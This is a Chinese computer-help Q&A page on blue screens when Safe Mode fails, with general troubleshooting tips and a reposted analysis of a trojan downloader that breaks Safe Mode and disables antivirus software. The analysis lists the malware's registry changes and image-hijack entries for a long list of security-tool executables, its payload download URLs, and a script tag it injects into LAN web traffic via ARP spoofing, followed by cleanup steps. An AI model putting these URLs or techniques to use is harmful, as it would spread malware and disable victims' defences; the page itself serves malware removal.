<small id='4xeq4ass'></small><noframes id='cakhini1'>

  • <tfoot id='0vcm0ln8'></tfoot>
    您的位置:荆州电脑信息网 > 电脑蓝屏 > 我的电脑安全模式被病毒破坏,一进安全模式就蓝屏,怎么解决啊?

    我的电脑安全模式被病毒破坏,一进安全模式就蓝屏,怎么解决啊?

    作者:电脑信息网日期:

    返回目录:电脑蓝屏


    Windows 蓝屏信息非常多,但它们产生的原因一般都集中在不兼容的硬件
    和驱动程序、有问题的软件、病毒等。针对这些引起蓝屏的因素提出一些常规
    的解决方案,以后再遇到蓝屏错误,你便可对照这些方案进行排除。
      1.重启
       有时只是某个程序或驱动程序一时犯错,重启后它们会改过自新。
      2.新硬件
       首先,应该检查新硬件是否插牢,这个被许多人忽视的问题往往会引发许
    多莫名其妙的故障。如果确认没有问题,将其拔下,然后换个插槽试试,并安
    装最新的驱动程序。同时还应对照微软网站的硬件兼容列表检查一下硬件是否
    与操作系统兼容。如果你的硬件没有在表中,那么就得到硬件厂商网站进行查
    询,或拨打他们的咨询电话。  
      3.新驱动和新服务
    如果刚安装完某个硬件的新驱动,或安装了某个软件,而它又在系统服务中添
    加了相应项目(比如:杀毒软件、CPU降温软件、防火墙软件等),在重启或使
    用中出现了蓝屏故障,到安全模式下把它们卸载了或禁用掉。  
      4.检查病毒  
      比如冲击波和震荡波等病毒有时会导致Windows蓝屏死机,因此查杀病毒
    必不可少。同时一些木马间谍软件也会引发蓝屏,所以最好再用相关工具进行
    扫描检查。
      5.检查BIOS和硬件兼容性  
      对于新装的电脑经常出现蓝屏问题,应该检查并升级BIOS到最新版本,同
    时关闭其中的内存相关项,比如:缓存和映射。另外,还应该对照微软网站的硬
    件兼容列表检查自己的硬件。还有就是,如果主板BIOS无法支持大容量硬盘也
    会导致蓝屏,需要对其进行升级。
      6.检查系统日志
      在“开始\运行”中输入“EventVwr.msc”,回车后打开“事件查看器”
    ,注意检查
    其中的“系统日志”和“应用程序日志”中标明“错误”的项。
     7.查询停机码   
      把蓝屏中密密麻麻的E文记下来,用本工具查询,一般情况下,都能找到相
    应的解决案例。
      8.最后一次正确配置e799bee5baa6e79fa5e98193e4b893e5b19e362
      一般情况下,蓝屏都出现于更新了硬件驱动或新加硬件并安装其驱动后,
    这时可先把由系统提供的“最后一次正确配置”启动电脑。
      9.安装最新的系统补丁和Service Pack
      有些蓝屏故障是Windows本身存在缺陷造成的,因此可通过安装最新的系
    统补丁和Service Pack来解决。


    蓝屏死机,是指微软Windows操作系统在无法从一个系统错误中恢复过来时所显示的蓝底白字的屏幕图像。

    可能原因:
    1、电脑中毒
    2、软件或驱动冲突
    3、硬件问题
    解决方法
    在开始-->;运行中输入:EventVwr.msc ,回车出现“事件查看器”,e799bee5baa6e79fa5e98193e58685e5aeb9331注意检查其中的“系统日志”和“应用程序日志”中表明“错误”的项。

    把蓝屏中密密麻麻的英文记下来,接着到其他电脑中上网,进入微软帮助与支持网站
    电脑蓝屏
    在左上角的“搜索(知识库)”中输入停机码。如果,搜索结果没有适合信息,可以选择“英文知识库”再搜索一遍。一般情况下,会在这里找到有用的解决案例。另外,在百度、Google等搜索引擎中使用蓝屏的停机码或者后面的说明文字为关键词搜索,往往也会有收获。
    一般情况下,蓝屏都是在硬件驱动或新加硬件并安装驱动后,出现冲突或不兼容的情况,这时Windows提供的“最后一次正确配置”就是解决蓝屏的快捷方式。
    重启系统,在出现启动菜单时,按下F8键,就会出现windows高级启动选项菜单,键盘光标,选定:“最后一次正确配置”,然后,回车键(Enter),回车键(Enter),按下去。
    有些蓝屏是Windows本身存在缺陷造成的,因此可通过安装最新的系统补丁和Service Pack来解决。
    如果系统可以运行的情况下,错打了冲突的补丁,可以用,金山急救箱,来“扩展扫描”,立即扫描,扫描完毕后,会提示:哪个补丁,不需要修复。然后,照提示点:立即处理。完毕后,如果提示需要“重启电脑”,立即重启电脑,就可以了。

    借用一下cz8765083的回答,很全面:
    修复,不过很复杂的 ,比重装个系统麻烦多了
    最近发现很多人出现了打不开shadu软件 反病 毒工具 甚至带有病 毒字样的窗口 今天就接到了这样的一个样本 先前
    这是一个可以说结合了几乎所有病 毒的特征的病毒 除了感染文件之外 可以说是比熊猫有过之而无不及!
    病毒特征:
    1.破坏安全模式
    2.结束常见杀毒软件以及反病毒工具进程
    3.监控窗口
    4.关闭自动更新以及Windows安全中心
    5.屏蔽显示隐藏文件
    6.下载木马
    7.IFEO映像劫持
    8.GHOST文件引导破坏
    9.各盘符均有引导启动关联文件,即便你重装系统盘也照样发作

    分析报告
    File: 1201AEC1.exe
    Size: 36435 bytes
    MD5: 23D80E8E5C2B7EB19E006E80C9BD4BFB
    SHA1: E760703C8776C652B424FA62AF945434FB786BE5
    CRC32: 27CA1195
    加壳方式:UPX
    病毒运行后
    在C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面释放一个同样由8个数字和字母组成的组合的文件名的dll 和一个同名的dat 文件
    我这里是C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dll
    这个随机的数字应该与机器码有关
    该dll插入Explorer进程 Timplatform以及ctfmon进程

    删除C:\WINDOWS\system32\verclsid.exe
    将其重命名为e69da5e887aae799bee5baa6e79fa5e98193331verclsid.exe.bak
    释放41115BDD.exe(随机8位)和autorun.inf到除系统分区外的其他分区

    注册表相关操作
    删除
    HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
    HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
    破坏安全模式

    修改

    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue值

    为0x00000000
    HKU\S-1-5-21-1085031214-1078145449-839522115-500

    \Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden为0x00000002
    HKU\S-1-5-21-1085031214-1078145449-839522115-500

    \Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden为0x00000001
    屏蔽显示隐藏文件

    修改常见杀毒软件服务的start键值为0x00000004
    如HKLM\SYSTEM\ControlSet001\Services\RfwService\Start: 0x00000004

    修改HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Start
    和HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\start键值为0x00000004
    关闭自动更新

    添加IFEO映像劫持项( 我的意见是用Autoruns删除映像劫持)
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adam.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvr.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvc.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.com
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDsty.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FTCleanerShell.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmo.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvc.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaload.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScn.SCR
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMain.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASTask.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVDX.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSetup.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchr.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMon.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMFilter.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32X.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFWSvc.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegEx.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\krepair.COM
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsLoader.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenter.kxp
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvfwMcl.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP_1.kxp
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvol.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolself.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvReport.kxp
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVScan.kxp
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXP.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVStub.kxp
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvupload.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvwsc.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1.kxp
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch9x.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchX.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loaddll.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcconsol.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmqczj.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmsk.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSetup.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32krn.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kui.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSET.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonD.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStub.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavTask.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegClean.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwcfg.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMain.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwProxy.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrv.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RsAgent.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rsaupd.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiep.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safelive.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shcfg32.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmartUp.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREng.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\symlcsvc.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafe.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetector.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trojanwall.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHost.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAgent.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAttachment.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxCfg.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxFwHlp.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxPol.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UpLive.EXE.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiClean.exe
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zxsweep.exe

    被劫持到C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面的那个dat文件

    下载dl1.exe到临时文件夹
    首先下载http://google.xxxx38.org/update/down.txt看病毒是否需要更新

    然后分别下载http://google.xxxx38.org/update/wow.exe
    http://google.xxxx38.org/update/mh.exe
    http://google.xxxx38.org/update/wm.exe
    http://google.xxxx38.org/update/my.exe
    http://google.xxxx38.org/update/wl.exe
    http://google.xxxx38.org/update/zt.exe
    http://google.xxxx38.org/update/jh.exe
    http://google.xxxx38.org/update/tl.exe
    http://google.xxxx38.org/update/1.exe
    http://google.xxxx38.org/update/2.exe 到program files 文件夹 并把他们命名为ycnt1.exe~ycnt10.exe

    具体每个文件的生成物就不一一列举了
    不过值得一提的是ycnt9.exe这个木马
    他生成C:\WINDOWS\system32\win1ogo.exe
    并且该木马试图向局域网内所有用户的80端口每隔5000ms进行arp欺骗
    插入<script language=javascript src=http://google.171738.org/ad2.js></script>代码
    也就是局域网内所有用户在打开网页时都会被插入这段代码

    所有木马文件植入完毕后 生成物如下
    C:\WINDOWS\system32\drivers\npf.sys
    C:\WINDOWS\system32\Kvsc3.dll
    C:\WINDOWS\system32\msdebug.dll
    C:\WINDOWS\system32\nwiztlbu.exe
    C:\WINDOWS\system32\Packet.dll
    C:\WINDOWS\system32\RemoteDbg.dll
    C:\WINDOWS\system32\testdll.dll
    C:\WINDOWS\system32\WanPacket.dll
    C:\WINDOWS\system32\win1ogo.exe
    C:\WINDOWS\system32\windds32.dll
    C:\WINDOWS\system32\winpcap.exe
    C:\WINDOWS\system32\wpcap.dll
    C:\WINDOWS\system32\xpdhcp.dll
    C:\WINDOWS\Kvsc3.exe
    C:\WINDOWS\testexe.exe
    C:\Program Files\Common Files\cssrs.exe
    sreng日志反映如下(在处理一些东西后扫描的这里提前列出)

    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
    <testrun><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testexe.exe> []
    <Kvsc><C:\WINDOWS\Kvsc3.exe> []
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
    <{15BD4111-4111-5BDD-115B-111BD1115BDD}><C:\Program Files\Common Files\Microsoft

    Shared\MSINFO\41115BDD.dll> []
    [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    <Userinit><C:\WINDOWS\system32\userinit.exe,C:\Program Files\Common Files\cssrs.exe,> [N/A]
    [PID: 1400][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-

    2158)]
    [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\testdll.dll] [N/A, ]
    [C:\WINDOWS\system32\Kvsc3.dll] [N/A, ]

    解决办法如下:

    1.确定那个8位随机数的dll的名称
    这里我们选用winrar确定那个dll的名称
    方法是:打开winrar.exe
    工具 查看
    在上面的地址栏中 进入c:\program files\common files\microsoft shared\msinfo目录
    我这台被感染的电脑的文件名为41115bdd.dll

    2.使用强制删除工具删除那个dll文件
    这里我们选用Xdelbox1.2这个软件

    XDelBox1.2(Dos级别灭杀工具):
    1、dos级文件删除方式,打造病毒清除新模式
    2、无须进入安全模式,即可删除所有病毒文件
    3、支持一次重启批量删除多个文件
    4、复制路径的删除添加方式更适用于网络求助(支持拖曳)
    注意:删除时复制所有要删除文件的路径,在待删除文件列表里点击右键选择从剪贴板导入。导入后在要删除文件上点击右键,选择立刻重启删除,电脑会重启进入DOS界面进行删除操作,删除完成后会自动重启进入你安装的操作系统。操作前注意保存电脑中正在打开的文档。有关XDelBox的详细说明请看xdelbox1.2目录下help.chm

    重起机器后
    3.恢复被映像劫持的软件
    这里我们使用autoruns这个软件 由于这个软件也被映像劫持了 所以我们随便把他改个名字
    打开这个软件后 找到Image hijack (映像劫持)
    删除除了Your Image File Name Here without a pathSymbolic Debugger for Windows 2000Microsoft Corporationc:\windows\system32\ntsd.exe
    以外的所有项目

    4.此时我们就可以打开sreng了 呵呵
    打开sreng
    系统修复 高级修复 点击修复安全模式 在弹出的对话框中点击是

    5.恢复显示隐藏文件

    把下面的 代码拷入记事本中然后另存为1.reg文件
    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL

    ]
    "RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
    "Text"="@shell32.dll,-30500"
    "Type"="radio"
    "CheckedValue"=dword:00000001
    "ValueName"="Hidden"
    "DefaultValue"=dword:00000002
    "HKeyRoot"=dword:80000001
    "HelpID"="shell.hlp#51105"

    双击1.reg把这个注册表项导入

    好了 此时病毒对于我们的所有限制已经解除了

    6.清除其下载的木马了
    重起机器 进入安全模式
    双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹"

    清除"隐藏受保护的操作系统文件

    用WINRAR打开 然后查看以下路径,将发现的名字都删(里面是病毒下载下来的木马)
    C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.exe
    C:\Documents and Settings\Administrator\Local Settings\Temp\testexe.dll
    C:\Documents and Settings\Administrator\Local Settings\Temp\dl1.exe
    C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDD.dat(随机8位数字字母组合)
    C:\WINDOWS\Kvsc3.exe
    C:\WINDOWS\testexe.exe
    C:\WINDOWS\Help\41115BDD.chm(随机8位数字字母组合)
    C:\WINDOWS\system32\DirectX\DirectX.ini
    C:\WINDOWS\system32\drivers\npf.sys
    C:\WINDOWS\system32\Kvsc3.dll
    C:\WINDOWS\system32\msdebug.dll
    C:\WINDOWS\system32\nwiztlbu.exe
    C:\WINDOWS\system32\Packet.dll
    C:\WINDOWS\system32\RemoteDbg.dll
    C:\WINDOWS\system32\testdll.dll
    C:\WINDOWS\system32\WanPacket.dll
    C:\WINDOWS\system32\win1ogo.exe
    C:\WINDOWS\system32\windds32.dll
    C:\WINDOWS\system32\winpcap.exe
    C:\WINDOWS\system32\wpcap.dll
    C:\WINDOWS\system32\xpdhcp.dll
    C:\WINDOWS\41115BDD.hlp(随机8位数字字母组合)
    C:\WINDOWS\Kvsc3.exe
    C:\WINDOWS\testexe.exe
    C:\Program Files\Common Files\cssrs.exe
    C:\Program files\ycnt1.exe~ycnt10.exe(如果有的话)

    最后别忘了
    7.还是用winrar 删除各个分区下面的autorun.inf和 41115BDD.exe(随机8位数字字母组合)
    一定不要双击 最好的方法是用winrar看
    8.装杀毒软件 保护好你的电脑
    到此为止,病毒已经完全清除。。。
    <tfoot id='vsrm9n2r'></tfoot>

    <small id='xhtregk3'></small><noframes id='zzf9je3g'>

      <tbody id='94uf9o1y'></tbody>
    • 相关阅读

      关键词不能为空

      标签导航

      电脑经常蓝屏怎么办??代码0x0000001a 电脑经常蓝屏,蓝屏代码:0x0000001a 电脑每天都蓝屏!stop:0x0000001A 电脑老是出现蓝屏stop:0x0000001A(0X0004... 光猫自带的wifi怎么设置才能用 移动光猫自带wifi怎么设置? 联通光猫自带的wifi怎么设置才能用? 光猫自带的wifi怎么设置才能用? win10开机怎么直接进入桌面 Win10如何绕过密码输入就直接进入桌面 Win10开机怎么做跳过欢迎界面直接进入桌面 怎样关闭win10登陆界面直接进入桌面 为什么电脑会突然跳出来说我的WINDOWS不是正版? win7系统为什么突然显示windows副本不是正版 今天电脑突然显示Windows7系统不是正版? 电脑桌面右下角突然出现Windows7 内部版本7601 此... 电脑中病毒了!杀毒软件无法启动,安全模式打开蓝屏!怎么办!具... 为什么我的电脑一进安全模式就蓝屏 电脑安全模式解决蓝屏 为什么我的电脑进入不了安全模式,一进入就蓝屏 怎么设置QQ空间背景音乐的播放顺序? QQ空间背景音乐播放是否可以调换先后顺序? QQ空间背景音乐怎么设置顺序 QQ空间背景音乐怎么连续播放啊 怎么找不到调整顺序的那个 win10系统为什么用不了photoshop cs6 windows10装了Photoshop CS6后无法使用 ps cs6能不能兼容win10 win10装上ps打不开怎么办 win7屏保怎么设置时间和密码 win7家庭版怎样设置屏保密码? 谁给我一个bat 或者 vbs的代码,每次开机都会自动出现的... vbs cmd bat的代码都一样吗?可以互相之间用吗? vbs或bat整人代码 如何用bat代码让电脑蓝屏? 不让它自动跳转! 请问在3G与4G网络中如何手动切换? 安卓手机怎么手动切换3G&#47;2G网络模式 手机不支持4G网络,在移动网络设置里面切换,有三种选择,怎么... 华为手机怎么切换2g3g网络 win10安装realtek声卡驱动没有声音怎么办 win10系统声卡驱动完整但是没有声音怎么办 win10声卡驱动和设置都正确,还是没有声音,应该怎么办? win10声卡驱动和设置都正确,还是没有声音,怎么办 HP Laserjet 5200LX PCL6 win7 6... win7电脑连接USB设备总是提示安装驱动失败怎么办 HP m126a打印机在Win7的64位系统上安装驱动后一直... win7系统,USB连接的打印机安装驱动后,无法默认打印机,... 电脑蓝屏,有DMP文件,哪位高手帮我分析下蓝屏的原因 Windows7蓝屏后产生的.dmp文件如何打开以及如何分析... Windows10电脑蓝屏DMP文件windbg结果求分析 windows 7系统,电脑有时候蓝屏,下面是dmp文件,蓝... DNF怎么主动设置仓库锁 dnf 在哪设置仓库锁啊 游戏《地下城与勇士》中如何设置仓库锁?

      电脑蓝屏,win7,win10相关问题_荆州电脑信息网